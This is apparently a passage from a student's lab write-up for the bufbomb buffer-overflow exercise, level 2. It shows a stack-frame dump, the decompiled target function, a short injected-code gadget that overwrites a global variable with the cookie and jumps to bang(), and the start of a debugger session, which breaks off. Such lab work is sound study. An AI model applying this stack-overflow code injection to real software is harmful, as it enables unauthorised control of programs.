00000018 -00000018 db ? ; undefined -00000017 db ? ; undefined -00000016 db ? ; undefined -00000015 db ? ; undefined -00000014 db ? ; undefined -00000013 db ? ; undefined -00000012 db ? ; undefined -00000011 db ? ; undefined -00000010 db ? ; undefined -0000000F db ? ; undefined -0000000E db ? ; undefined -0000000D db ? ; undefined -0000000C db ? ; undefined -0000000B db ? ; undefined -0000000A db ? ; undefined -00000009 db ? ; undefined -00000008 db ? ; undefined -00000007 db ? ; undefined -00000006 db ? ; undefined -00000005 db ? ; undefined -00000004 db ? ; undefined -00000003 db ? ; undefined -00000002 db ? ; undefined -00000001 db ? ; undefined +00000000 s db 4 dup(?) +00000004 r db 4 dup(?) +00000008 arg_0 dd ? +0000000C +0000000C ; end of stack variables
will now we arrive level2,we need use stack overflow turn to bang and make this global_vaule==cookie (damn,if i can use pwntools it will be very easy.)
1 2 3 4 5 6 7 8 9 10 11 12 13
void __noreturn bang() { if ( global_value == cookie ) { __printf_chk(1, "Bang!: You set global_value to 0x%x\n", global_value); validate(2); } else { __printf_chk(1, "Misfire: global_value = 0x%x\n", global_value); } exit(0); }
We can know the address we hold global variables is 0x0804D100
1
.bss:0804D100 global_value dd ? ; DATA XREF: bang+6↑r
ok let we go,now we can use one gadget to fix it vaule
1 2 3
movl $0x4e06a707,0x804d100 #change vaule push $0x8048c9d ret #push and ret just like call
then we need use gdb to find the location of write funtion**(eax stores the return value, so we change the return value here to the code we passed above)**
1 2 3 4 5 6 7 8 9 10
pwndbg> r -u i am lovely please give me money Starting program: /home/q/bufbomb -u i am lovely please give me money Userid: i Cookie: 0x4e06a707